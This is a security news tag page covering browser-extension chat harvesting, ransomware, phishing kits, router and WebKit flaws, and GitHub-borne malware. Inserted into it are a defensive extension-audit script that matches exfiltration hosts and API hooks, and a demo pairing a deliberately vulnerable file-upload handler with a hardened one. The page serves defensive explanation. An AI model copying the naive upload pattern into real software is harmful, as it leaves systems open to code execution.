Tag: Cyber Threats

  • Featured Chrome Browser Extension Caught Intercepting Millions of Users' AI Chats

    A Google Chrome extension with a “Featured” badge and six million users has been observed silently gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity.

    The extension in question is Urban VPN Proxy, which has a 4.7 rating on the Google Chrome Web Store. It’s advertised as the “best secured Free VPN access to any website, and unblock content.” Its developer is a Delaware-based company named Urban Cyber Security Inc. On the Microsoft Edge Add-ons marketplace, it has 1.3 million installations.

    Despite claiming that it allows users to “protect your online identity, stay protected, and hide your IP,” the extension was updated on July 9, 2025, when version 5.5.0 was released with the AI data harvesting enabled by default using hard-coded settings.

    Specifically, this is achieved by means of a tailored executor JavaScript that’s triggered for each of the AI chatbots (i.e., chatgpt.js, claude.js, gemini.js) to intercept and gather the conversations every time a user who has installed the extension visits any of the targeted platforms.

    Once the script is injected, it overrides the browser APIs used to handle network requests – fetch() and XMLHttpRequest() – to make sure that every request is first routed through the extension’s code so as to capture the conversation data, including users’ prompts and the chatbot’s responses, and exfiltrate them to two remote servers (“analytics.urban-vpn[.]com” and “stats.urban-vpn[.]com”).
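The interception described above leaves traces in the extension's own files. The following audit script is an added example, not code from Koi Security or the extension: it walks a browser profile's `Extensions/<id>/<version>/` directories and flags JavaScript that reassigns `fetch` or `XMLHttpRequest`, or that references the two hosts named in the report. The regex heuristics, verdict labels and the two sample extensions are constructed for illustration.

```python
import json
import re
import tempfile
from pathlib import Path

# Hosts named in the article (defanged there, written plainly here for matching).
EXFIL_HOSTS = ("analytics.urban-vpn.com", "stats.urban-vpn.com")

# Heuristic (assumption): assignments that replace the page's network primitives.
HOOK_PATTERNS = {
    "fetch": re.compile(r"\b(?:window|self|globalThis)\.fetch\s*=(?!=)"),
    "XMLHttpRequest": re.compile(
        r"\bXMLHttpRequest\.prototype\.(?:open|send)\s*=(?!=)"
        r"|\b(?:window|self|globalThis)\.XMLHttpRequest\s*=(?!=)"
    ),
}


def audit_extension(ext_dir):
    """Scan one unpacked extension version directory and return its findings."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    hooks, hosts = {}, {}
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="replace")
        rel = js.relative_to(ext_dir).as_posix()
        for api, pattern in HOOK_PATTERNS.items():
            if pattern.search(text):
                hooks.setdefault(api, []).append(rel)
        for host in EXFIL_HOSTS:
            if host in text:
                hosts.setdefault(host, []).append(rel)
    # Sites the extension injects scripts into, taken straight from the manifest.
    injects = sorted({m for cs in manifest.get("content_scripts", [])
                      for m in cs.get("matches", [])})
    if hosts:
        verdict = "known-indicator"   # references a host from the report
    elif hooks:
        verdict = "review"            # replaces fetch/XHR; needs a human look
    else:
        verdict = "no-match"
    return {"name": manifest.get("name"), "version": manifest.get("version"),
            "injects_into": injects, "hooks": hooks, "hosts": hosts,
            "verdict": verdict}


def audit_profile(extensions_root):
    """Audit every <id>/<version>/manifest.json under a profile's Extensions dir."""
    results = {}
    for manifest in sorted(Path(extensions_root).glob("*/*/manifest.json")):
        results[manifest.parent.parent.name] = audit_extension(manifest.parent)
    return results


def build_constructed_profile(root):
    """Write two constructed extensions (not real samples) for the demo."""
    root = Path(root)
    hooked = root / ("a" * 32) / "5.5.0_0"
    (hooked / "executors").mkdir(parents=True)
    (hooked / "manifest.json").write_text(json.dumps({
        "name": "Constructed VPN sample", "version": "5.5.0",
        "content_scripts": [{"matches": ["https://chat.example/*"],
                             "js": ["executors/chat.js"]}]}))
    # A pass-through wrapper is enough to exercise the hook pattern.
    (hooked / "executors" / "chat.js").write_text(
        "const orig = window.fetch;\n"
        "window.fetch = function (...args) { return orig.apply(this, args); };\n")
    (hooked / "background.js").write_text(
        'const ENDPOINT = "https://analytics.urban-vpn.com/";\n')
    plain = root / ("b" * 32) / "1.0.0_0"
    plain.mkdir(parents=True)
    (plain / "manifest.json").write_text(json.dumps(
        {"name": "Constructed notes sample", "version": "1.0.0"}))
    # A comparison, not an assignment: must not be flagged.
    (plain / "popup.js").write_text(
        "if (window.fetch === undefined) { console.log('no fetch'); }\n")
    return root


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        return audit_profile(build_constructed_profile(tmp))


if __name__ == "__main__":
    for ext_id, finding in run_demo().items():
        print(ext_id, finding["verdict"], finding["hooks"], finding["hosts"])
```

A "review" verdict is only a prompt for manual inspection, since legitimate extensions also wrap these APIs and obfuscated code will not match the patterns.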

    The exact list of data captured by the extension is as follows –

    • Prompts entered by the user
    • Chatbot responses
    • Conversation identifiers and timestamps
    • Session metadata
    • AI platform and model used

    “Chrome and Edge extensions auto-update by default,” Koi Security’s Idan Dardikman said in a report published today. “Users who installed Urban VPN for its stated purpose – VPN functionality – woke up one day with new code silently harvesting their AI conversations.”

    It’s worth mentioning that Urban VPN’s updated privacy policy, as of June 25, 2025, mentions that it collects this data to enhance Safe Browsing and for marketing analytics purposes, and that any other secondary use of the gathered AI prompts will be carried out on de-identified and anonymized data –

    As part of the Browsing Data, we will collect the prompts and outputs quired [sic] by the End-User or generated by the AI chat provider, as applicable. Meaning, we are only interested in the AI prompt and the results of your interaction with the chat AI.

    Due to the nature of the data involved in AI prompts, some sensitive personal information may be processed. However, the purpose of this processing is not to collect personal or identifiable data, we cannot fully guarantee the removal of all sensitive or personal information, we implement measures to filter out or eliminate any identifiers or personal data you may submit through the prompts and to de-identify and aggregate the data.

    One of the third-parties it shares “Web Browsing Data” with is an affiliated ad intelligence and brand monitoring firm named BIScience. The company uses the raw (not anonymized) data to create insights that are “commercially used and shared with Business Partners,” the VPN software maker notes.

    It’s worth noting that BIScience, which also happens to own Urban Cyber Security Inc., was called out by an anonymous researcher earlier this January for collecting users’ browsing history, or clickstream data, as it’s called, under misleading privacy policy disclosures.

    The company is alleged to provide a software development kit (SDK) to partner third-party extension developers to collect clickstream data from users, which is transmitted to the sclpfybn[.]com and other endpoints under its control.

    “BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy, which are the ‘approved use cases,’” the researcher noted, adding they “develop user-facing features that allegedly require access to browsing history, to claim the ‘necessary to providing or improving your single purpose’ exception.”

    On the extension listing page, Urban VPN also highlights an “AI protection” feature, which it says checks prompts for personal data, chatbot responses for suspicious or unsafe links, and displays a warning before users submit their prompts or click on them.

    While this monitoring is framed as preventing users from accidentally sharing any personal information, what the developers fail to mention is that the data collection happens regardless of whether the feature is enabled.

    “The protection feature shows occasional warnings about sharing sensitive data with AI companies,” Dardikman said. “The harvesting feature sends that exact sensitive data – and everything else – to Urban VPN’s own servers, where it’s sold to advertisers. The extension warns you about sharing your email with ChatGPT while simultaneously exfiltrating your entire conversation to a data broker.”

    Koi Security said it observed identical AI harvesting functionality in three other unique extensions from the same publisher across Chrome and Microsoft Edge, taking its total install base to over eight million –

    • 1ClickVPN Proxy
    • Urban Browser Guard
    • Urban Ad Blocker

    All these extensions, with the exception of Urban Ad Blocker for Edge, carry the “Featured” badge, giving users an impression that they follow the platform’s “best practices and meet a high standard of user experience and design.”

    “These badges signal to users that the extensions have been reviewed and meet platform quality standards,” Dardikman pointed out. “For many users, a Featured badge is the difference between installing an extension and passing it by – it’s an implicit endorsement from Google and Microsoft.”

    The findings once again demonstrate how trust associated with extension marketplaces can be abused to amass sensitive data at scale, especially at a time when users are increasingly sharing deeply personal information, getting advice, and discussing emotions with AI chatbots.

    The Hacker News has reached out to both Google and Microsoft for comment, and we will update the story if we hear back.


    Source: thehackernews.com…

  • VolkLocker Ransomware Exposed by Hard-Coded Master Key Allowing Free Decryption

    Dec 15, 2025 | Ravie Lakshmanan | Ransomware / Cybercrime

    The pro-Russian hacktivist group known as CyberVolk (aka GLORIAMIST) has resurfaced with a new ransomware-as-a-service (RaaS) offering called VolkLocker that suffers from implementation lapses in test artifacts, allowing users to decrypt files without paying an extortion fee.

    According to SentinelOne, VolkLocker (aka CyberVolk 2.x) emerged in August 2025 and is capable of targeting both Windows and Linux systems. It’s written in Golang.

    “Operators building new VolkLocker payloads must provide a bitcoin address, Telegram bot token ID, Telegram chat ID, encryption deadline, desired file extension, and self-destruct options,” security researcher Jim Walter said in a report published last week.

    Once launched, the ransomware attempts to escalate privileges, performs reconnaissance and system enumeration, including checking local MAC address prefixes against known virtualization vendors like Oracle and VMware. In the next stage, it lists all available drives and determines the files to be encrypted based on the embedded configuration.

    VolkLocker uses AES-256 in Galois/Counter Mode (GCM) for encryption through Golang’s “crypto/rand” package. Every encrypted file is assigned a custom extension such as .locked or .cvolk.

    However, an analysis of the test samples has uncovered a fatal flaw where the locker’s master keys are not only hard-coded in the binaries, but are also used to encrypt all files on a victim system. More importantly, the master key is also written to a plaintext file in the %TEMP% folder (“C:\Users\AppData\Local\Temp\system_backup.key”).

    Since this backup key file is never deleted, the design blunder enables self-recovery. That said, VolkLocker has all the hallmarks typically associated with a ransomware strain. It makes Windows Registry modifications to thwart recovery and analysis, deletes volume shadow copies, and terminates processes associated with Microsoft Defender Antivirus and other common analysis tools.

    However, where it stands out is in the use of an enforcement timer, which wipes the content of user folders, viz. Documents, Desktop, Downloads, and Pictures, if victims fail to pay within 48 hours or enter the wrong decryption key three times.

    CyberVolk’s RaaS operations are managed through Telegram, costing prospective customers between $800 and $1,100 for either a Windows or Linux version, or between $1,600 and $2,200 for both operating systems. VolkLocker payloads come with built-in Telegram automation for command-and-control, allowing users to message victims, initiate file decryption, list active victims, and get system information.

    As of November 2025, the threat actors have advertised a remote access trojan and keylogger, both priced at $500 each, indicating a broadening of their monetization strategy.

    CyberVolk launched its own RaaS in June 2024. Known for conducting distributed denial-of-service (DDoS) and ransomware attacks on public and government entities to support Russian government interests, it’s believed to be of Indian origin.

    “Despite repeated Telegram account bans and channel removals throughout 2025, CyberVolk has reestablished its operations and expanded its service offerings,” Walter said. “Defenders should see CyberVolk’s adoption of Telegram-based automation as a reflection of broader trends among politically-motivated threat actors. These groups continue to lower barriers for ransomware deployment while operating on platforms that provide convenient infrastructure for criminal services.”


    Source: thehackernews.com…

  • Phantom Stealer Spread by ISO Phishing Emails Hitting Russian Finance Sector

    Dec 15, 2025 | Ravie Lakshmanan | Malware / Cybercrime

    Cybersecurity researchers have disclosed details of an active phishing campaign that’s targeting a wide range of sectors in Russia with phishing emails that deliver Phantom Stealer via malicious ISO optical disc images.

    The activity, codenamed Operation MoneyMount-ISO by Seqrite Labs, has primarily singled out finance and accounting entities, with those in the procurement, legal, and payroll verticals emerging as secondary targets.

    “This campaign employs a fake payment confirmation lure to deliver the Phantom information-stealing malware through a multi-stage attachment chain,” the cybersecurity company said.

    The infection chain begins with a phishing email that masquerades as legitimate financial communications, urging recipients to confirm a recent bank transfer. Attached to the email is a ZIP archive that claims to contain additional details, but, instead, contains an ISO file that, when launched, mounts on the system as a virtual CD drive.

    The ISO image (“Подтверждение банковского перевода.iso” or “Bank transfer confirmation.iso”) serves as an executable that’s designed to launch Phantom Stealer by means of an embedded DLL (“CreativeAI.dll”).

    Phantom Stealer is capable of extracting data from cryptocurrency wallet browser extensions installed in Chromium-based browsers and desktop wallet apps, as well as grabbing files, Discord authentication tokens, and browser-related passwords, cookies, and credit card details.

    It also monitors clipboard content, logs keystrokes, and runs a series of checks to detect virtualized, sandboxed, or analysis environments, and if so, aborts its execution. Data exfiltration is achieved via a Telegram bot or to an attacker-controlled Discord webhook. On top of that, the stealer enables file transfer to an FTP server.

    In recent months, Russian organizations, mainly human resources and payroll departments, have also been targeted by phishing emails that employ lures related to bonuses or internal financial policies to deploy a previously undocumented implant named DUPERUNNER that loads AdaptixC2, an open-source command-and-control (C2) framework.

    Dubbed DupeHike, the campaign has been attributed to a threat cluster named UNG0902.

    “The ZIP has been used as a preliminary source of spear-phishing-based infection containing decoys with PDF and LNK extension, which downloads the implant DUPERUNNER, which finally executes the Adaptix C2 Beacon,” Seqrite said.

    The LNK file (“Документ_1_О_размере_годовой_премии.pdf.lnk” or “Document_1_On_the_amount_of_the_annual_bonus.pdf.lnk”), in turn, proceeds to download DUPERUNNER from an external server using “powershell.exe.” The primary responsibility of the implant is to retrieve and display a decoy PDF and launch AdaptixC2 by injecting it into a legitimate Windows process like “explorer.exe,” “notepad.exe,” and “msedge.exe.”

    Other phishing campaigns have taken aim at finance, legal, and aerospace sectors in Russia to distribute Cobalt Strike and malicious tools like Formbook, DarkWatchman, and PhantomRemote that are capable of data theft and hands-on keyboard control. The email servers of compromised Russian companies are used to send the spear-phishing messages.

    French cybersecurity company Intrinsec has attributed the intrusion set targeting the Russian aerospace industry to hacktivists aligned with Ukrainian interests. The activity, detected between June and September 2025, shares overlaps with Hive0117, Operation CargoTalon, and Rainbow Hyena (aka Fairy Trickster, Head Mare, and PhantomCore).

    Some of these efforts have also been found to redirect users to phishing login pages hosted on the InterPlanetary File System (IPFS) and Vercel, designed to steal credentials associated with Microsoft Outlook and Bureau 1440, a Russian aerospace company.

    “The campaigns observed between June and September 2025 […] aimed at compromising entities actively cooperating with Russia’s army amidst the current conflict with Ukraine, largely assessed by the Western sanctions imposed on them,” Intrinsec said.


    Source: thehackernews.com…

  • CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks

    Dec 13, 2025 | Ravie Lakshmanan | Network Security / Vulnerability

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild.

    CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file upload vulnerability that could be exploited to achieve remote code execution by means of a malicious HTTP request.

    “A specially crafted HTTP request can upload a file, resulting in executable code being uploaded, and routable, to the webserver,” the agency said. “An attacker can make an authenticated HTTP request to trigger this vulnerability.”

    Details of the six-year-old flaw were publicly shared by Cisco Talos in April 2019, describing it as an exploitable remote code execution vulnerability in the ACEManager “upload.cgi” function of Sierra Wireless AirLink ES450 firmware version 4.9.3. Talos reported the flaw to the Canadian company in December 2018.

    “This vulnerability exists in the file upload capability of templates within the AirLink 450,” the company said. “When uploading template files, you can specify the name of the file that you are uploading.”

    “There are no restrictions in place that protect the files that are currently on the device, used for normal operation. If a file is uploaded with the same name of the file that already exists in the directory, then we inherit the permissions of that file.”

    Talos noted that some of the files that exist in the directory (e.g., “fw_upload_init.cgi” or “fw_status.cgi”) have executable permissions on the device, meaning an attacker can send HTTP requests to the “/cgi-bin/upload.cgi” endpoint to upload a file with the same name to achieve code execution.

    This is compounded by the fact that ACEManager runs as root, thereby causing any shell script or executable uploaded to the device to also run with elevated privileges.
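The root cause Talos describes, a client-chosen file name written over an existing file that keeps its permissions, can be reproduced and fixed in a few lines. The following is an added example, not ACEManager's code: a Python model of the naive write beside a hardened one. The `.xml` naming policy, the function names and the sample file contents are assumptions made for illustration.

```python
import os
import re
import stat
import tempfile

# Assumed policy for template uploads: plain name, fixed extension, no path parts.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.xml")


def save_upload_naive(directory, client_name, data):
    """The pattern from the advisory: trust the client-supplied file name."""
    path = os.path.join(directory, client_name)
    with open(path, "wb") as fh:   # truncates an existing file but keeps its mode bits
        fh.write(data)
    return path


def save_upload_hardened(directory, client_name, data):
    """Reject names outside the policy and never write over an existing file."""
    name = os.path.basename(client_name)
    if name != client_name or not SAFE_NAME.fullmatch(name):
        raise ValueError("rejected file name: %r" % client_name)
    path = os.path.join(directory, name)
    # O_EXCL makes creation fail if the name already exists; the requested mode
    # carries no execute bits, so the new file cannot run as a CGI.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def is_executable(path):
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def run_demo():
    """Exercise both handlers against a constructed CGI directory."""
    out = {}
    with tempfile.TemporaryDirectory() as cgi_dir:
        target = os.path.join(cgi_dir, "fw_status.cgi")
        with open(target, "wb") as fh:
            fh.write(b"#!/bin/sh\necho status\n")
        os.chmod(target, 0o755)    # executable, like the files Talos lists

        save_upload_naive(cgi_dir, "fw_status.cgi", b"constructed upload\n")
        with open(target, "rb") as fh:
            out["naive_replaced_content"] = fh.read() == b"constructed upload\n"
        out["naive_kept_exec_bit"] = is_executable(target)

        for name in ("fw_status.cgi", "../site.xml"):
            try:
                save_upload_hardened(cgi_dir, name, b"x")
                out["hardened:" + name] = "accepted"
            except ValueError:
                out["hardened:" + name] = "rejected"

        saved = save_upload_hardened(cgi_dir, "site_a.xml", b"<template/>")
        out["hardened_new_file_exec"] = is_executable(saved)
        try:
            save_upload_hardened(cgi_dir, "site_a.xml", b"<template/>")
            out["hardened_second_write"] = "accepted"
        except FileExistsError:
            out["hardened_second_write"] = "refused"
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "=", value)
```

Storing uploads outside any directory the web server executes from, and running the management service without root, removes the remaining impact even if a name check is bypassed.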

    The addition of CVE-2018-4063 to the KEV catalog comes a day after a honeypot analysis conducted by Forescout over a 90-day period revealed that industrial routers are the most attacked devices in operational technology (OT) environments, with threat actors attempting to deliver botnet and cryptocurrency miner malware families like RondoDox, Redtail, and ShadowV2 by exploiting the following flaws –

    Attacks have also been recorded from a previously undocumented threat cluster named Chaya_005 that weaponized CVE-2018-4063 in early January 2024 to upload an unspecified malicious payload with the name “fw_upload_init.cgi.” No further successful exploitation efforts have been detected since then.

    “Chaya_005 appears to be a broader reconnaissance campaign testing multiple vendor vulnerabilities rather than focusing on a single one,” Forescout Research – Vedere Labs said, adding it’s likely the cluster is no longer a “significant threat.”

    In light of active exploitation of CVE-2018-4063, Federal Civilian Executive Branch (FCEB) agencies are advised to update their devices to a supported version or discontinue the use of the product by January 2, 2026, since it has reached end-of-support status.


    Source: thehackernews.com…

  • Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild

    Dec 13, 2025 | Ravie Lakshmanan | Zero-Day / Vulnerability

    Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched by Google in Chrome earlier this week.

    The vulnerabilities are listed below –

    • CVE-2025-43529 (CVSS score: N/A) – A use-after-free vulnerability in WebKit that may lead to arbitrary code execution when processing maliciously crafted web content
    • CVE-2025-14174 (CVSS score: 8.8) – A memory corruption issue in WebKit that may lead to memory corruption when processing maliciously crafted web content

    Apple said it’s aware that the shortcomings “may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26.”

    It’s worth noting that CVE-2025-14174 is the same vulnerability that Google issued patches for in its Chrome browser on December 10, 2025. It’s been described by the tech giant as an out-of-bounds memory access in the company’s open-source Almost Native Graphics Layer Engine (ANGLE) library, specifically in its Metal renderer.

    Apple Security Engineering and Architecture (SEAR) and Google Threat Analysis Group (TAG) have been credited with discovering and reporting the flaw, while Apple credited TAG with finding CVE-2025-43529.

    This indicates that the vulnerabilities were likely weaponized in highly-targeted mercenary spyware attacks, given that they both affect WebKit, the rendering engine that’s also used in all third-party web browsers on iOS and iPadOS, including Chrome, Microsoft Edge, Mozilla Firefox, and others.

    The flaws have been addressed in the following versions and devices –

    • iOS 26.2 and iPadOS 26.2 – iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later
    • iOS 18.7.3 and iPadOS 18.7.3 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
    • macOS Tahoe 26.2 – Macs running macOS Tahoe
    • tvOS 26.2 – Apple TV HD and Apple TV 4K (all models)
    • watchOS 26.2 – Apple Watch Series 6 and later
    • visionOS 26.2 – Apple Vision Pro (all models)
    • Safari 26.2 – Macs running macOS Sonoma and macOS Sequoia

    With these updates, Apple has now patched nine zero-day vulnerabilities that were exploited in the wild in 2025, including CVE-2025-24085, CVE-2025-24200, CVE-2025-24201, CVE-2025-31200, CVE-2025-31201, CVE-2025-43200, and CVE-2025-43300.


    Source: thehackernews.com…

  • New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale

    Cybersecurity researchers have documented four new phishing kits named BlackForce, GhostFrame, InboxPrime AI, and Spiderman that are capable of facilitating credential theft at scale.

    BlackForce, first detected in August 2025, is designed to steal credentials and perform Man-in-the-Browser (MitB) attacks to capture one-time passwords (OTPs) and bypass multi-factor authentication (MFA). The kit is sold on Telegram forums for anywhere between €200 ($234) and €300 ($351).

    The kit, according to Zscaler ThreatLabz researchers Gladis Brinda R and Ashwathi Sasi, has been used to impersonate over 11 brands, including Disney, Netflix, DHL, and UPS. It’s said to be in active development.

    “BlackForce features several evasion techniques with a blocklist that filters out security vendors, web crawlers, and scanners,” the company said. “BlackForce remains under active development. Version 3 was widely used until early August, with versions 4 and 5 being released in subsequent months.”

    Phishing pages connected to the kit have been found to use JavaScript files with what has been described as “cache busting” hashes in their names (e.g., “index-[hash].js”), thereby forcing the victim’s web browser to download the latest version of the malicious script instead of using a cached version.

    In a typical attack using the kit, victims who click on a link are redirected to a malicious phishing page, after which a server-side check filters out crawlers and bots, before serving them a page that’s designed to mimic a legitimate website. Once the credentials are entered on the page, the details are captured and sent to a Telegram bot and a command-and-control (C2) panel in real-time using an HTTP client called Axios.

    When the attacker attempts to log in with the stolen credentials on the legitimate website, an MFA prompt is triggered. At this stage, the MitB techniques are used to display a fake MFA authentication page to the victim’s browser through the C2 panel. Should the victim enter the MFA code on the bogus page, it’s collected and used by the threat actor to gain unauthorized access to their account.

    “Once the attack is complete, the victim is redirected to the homepage of the legitimate website, hiding evidence of the compromise and ensuring the victim remains unaware of the attack,” Zscaler said.

    GhostFrame Fuels 1M+ Stealth Phishing Attacks

    Another nascent phishing kit that has gained traction since its discovery in September 2025 is GhostFrame. At the heart of the kit’s architecture is a simple HTML file that appears harmless while hiding its malicious behavior within an embedded iframe, which leads victims to a phishing login page to steal Microsoft 365 or Google account credentials.

    “The iframe design also allows attackers to easily switch out the phishing content, try new tricks or target specific regions, all without changing the main web page that distributes the kit,” Barracuda security researcher Sreyas Shetty said. “Further, by simply updating where the iframe points, the kit can avoid being detected by security tools that only check the outer page.”

    Attacks using the GhostFrame kit commence with typical phishing emails that claim to be about business contracts, invoices, and password reset requests, but are designed to take recipients to the fake page. The kit uses anti-analysis and anti-debugging to prevent attempts to inspect it using browser developer tools, and generates a random subdomain each time someone visits the site.

    The visible outer pages come with a loader script that’s responsible for setting up the iframe and responding to any messages from the HTML element. This can include changing the parent page’s title to impersonate trusted services, modifying the site favicon, or redirecting the top-level browser window to another domain.

    In the final stage, the victim is sent to a secondary page containing the actual phishing components through the iframe delivered via the constantly changing subdomain, thereby making it harder to block the threat. The kit also incorporates a fallback mechanism in the form of a backup iframe appended at the bottom of the page in the event the loader JavaScript fails or is blocked.

    InboxPrime AI Phishing Kit Automates Email Attacks

    If BlackForce follows the same playbook as other traditional phishing kits, InboxPrime AI goes a step further by leveraging artificial intelligence (AI) to automate mass mailing campaigns. It’s advertised on a 1,300-member-strong Telegram channel under a malware-as-a-service (MaaS) subscription model for $1,000, granting purchasers a perpetual license and full access to the source code.

    “It is designed to mimic real human emailing behavior and even leverages Gmail’s web interface to evade traditional filtering mechanisms,” Abnormal researchers Callie Baron and Piotr Wojtyla said.

    “InboxPrime AI blends artificial intelligence with operational evasion techniques and promises cybercriminals near-perfect deliverability, automated campaign generation, and a polished, professional interface that mirrors legitimate email marketing software.”

    The platform employs a user-friendly interface that allows customers to manage accounts, proxies, templates, and campaigns, mirroring commercial email automation tools. One of its core features is a built-in AI-powered email generator, which can produce entire phishing emails, including the subject lines, in a manner that mimics legitimate business communication.

    In doing so, these services further lower the barrier to entry for cybercrime, effectively eliminating the manual work that goes into drafting such emails. In its place, attackers can configure parameters, such as language, topic, or industry, email length, and desired tone, which the toolkit uses as inputs to generate convincing lures that match the chosen theme.

    What’s more, the dashboard enables users to save the produced email as a reusable template, complete with support for spintax to create variations of the email messages by substituting certain template variables. This ensures that no two phishing emails look identical and helps them bypass signature-based filters that look for similar content patterns.

    Some of the other supported features in InboxPrime AI are listed below –

    • A real-time spam diagnostic module that can analyze a generated email for common spam-filter triggers and suggest precise corrections
    • Sender identity randomization and spoofing, enabling attackers to customize display names for each Gmail session

    “This industrialization of phishing has direct implications for defenders: more attackers can now launch more campaigns with more volume, without any corresponding increase in defender bandwidth or resources,” Abnormal said. “This not only accelerates campaign launch time but also ensures consistent message quality, enables scalable, thematic targeting across industries, and empowers attackers to run professional-looking phishing operations without copywriting expertise.”

    Spiderman Creates Pixel-Perfect Replicas of European Banks

    The third phishing kit that has come under the cybersecurity radar is Spiderman, which permits attackers to target customers of dozens of European banks and online financial services providers, such as Blau, CaixaBank, Comdirect, Commerzbank, Deutsche Bank, ING, O2, Volksbank, Klarna, and PayPal.

    “Spiderman is a full-stack phishing framework that replicates dozens of European banking login pages, and even some government portals,” Varonis researcher Daniel Kelley said. “Its organized interface provides cybercriminals with an all-in-one platform to launch phishing campaigns, capture credentials, and manage stolen session data in real-time.”

    What’s notable about the modular kit is that its seller is marketing the solution in a Signal messenger group that has about 750 members, marking a departure from Telegram. Germany, Austria, Switzerland, and Belgium are the primary targets of the phishing service.

    Like in the case of BlackForce, Spiderman utilizes various techniques like ISP allowlisting, geofencing, and device filtering to ascertain that only the intended targets can access the phishing pages. The toolkit is also equipped to capture cryptocurrency wallet seed phrases, intercept OTP and PhotoTAN codes, and trigger prompts to gather credit card data.

    “This flexible, multi-step approach is particularly effective in European banking fraud, where login credentials alone often aren’t enough to authorize transactions,” Kelley explained. “After capturing credentials, Spiderman logs each session with a unique identifier so the attacker can maintain continuity through the entire phishing workflow.”

    Hybrid Salty-Tycoon 2FA Attacks Spotted

    BlackForce, GhostFrame, InboxPrime AI, and Spiderman are the latest additions to a long list of phishing kits like Tycoon 2FA, Salty 2FA, Sneaky 2FA, Whisper 2FA, Cephas, and Astaroth (not to be confused with a Windows banking trojan of the same name) that have emerged over the past year.

    In a report published earlier this month, ANY.RUN said it observed a new Salty-Tycoon hybrid that’s already bypassing detection rules tuned to either of them. The new attack wave coincides with a sharp drop in Salty 2FA activity in late October 2025, with early stages matching Salty 2FA, while later stages load code that reproduces Tycoon 2FA’s execution chain.

    “This overlap marks a meaningful shift; one that weakens kit-specific rules, complicates attribution, and gives threat actors more room to slip past early detection,” the company said.

    “Taken together, this provides clear evidence that a single phishing campaign, and, more interestingly, a single sample, contains traces of both Salty 2FA and Tycoon, with Tycoon serving as a fallback payload once the Salty infrastructure stopped working for reasons that are still unclear.”


    Source: thehackernews.com…

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads

    Cybersecurity researchers are calling attention to a new campaign that’s leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.

    “These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe,’” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News.

    PyStoreRAT has been described as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload.

    Attack chains involve distributing the malware through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are designed to appeal to analysts and developers.

    The earliest signs of the campaign go back to mid-June 2025, with a steady stream of “repositories” published since then. The threat actors promote the tools via social media platforms like YouTube and X, and artificially inflate the repositories’ star and fork metrics – a technique reminiscent of the Stargazers Ghost Network.

    The threat actors behind the campaign leverage either newly created GitHub accounts or those that lay dormant for months to publish the repositories, stealthily slipping the malicious payload in the form of “maintenance” commits in October and November after the tools began to gain popularity and landed on GitHub’s top trending lists.

    In fact, many of the tools did not function as they were advertised, only displaying static menus or non-interactive interfaces in some cases, while others performed minimal placeholder operations. The intention behind the operation was to lend them a veneer of legitimacy by abusing GitHub’s inherent trust and deceiving users into executing the loader stub that’s responsible for initiating the infection chain.

    This effectively triggers the execution of a remote HTML Application (HTA) payload that, in turn, delivers the PyStoreRAT malware, which comes with capabilities to profile the system, check for administrator privileges, and scan the system for cryptocurrency wallet-related files, specifically those associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.

    The loader stub gathers a list of installed antivirus products and checks for strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs), likely in an attempt to reduce visibility. In the event they are detected, it launches “mshta.exe” by means of “cmd.exe.” Otherwise, it proceeds with direct “mshta.exe” execution.

    Persistence is achieved by setting up a scheduled task that’s disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host. Some of the supported commands are listed below –

    • Download and execute EXE payloads, including Rhadamanthys
    • Download and extract ZIP archives
    • Download a malicious DLL and execute it using “rundll32.exe”
    • Fetch raw JavaScript code and execute it dynamically in memory using eval()
    • Download and install MSI packages
    • Spawn a secondary “mshta.exe” process to load additional remote HTA payloads
    • Execute PowerShell commands directly in memory
    • Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files
    • Delete the scheduled task to remove the forensic trail

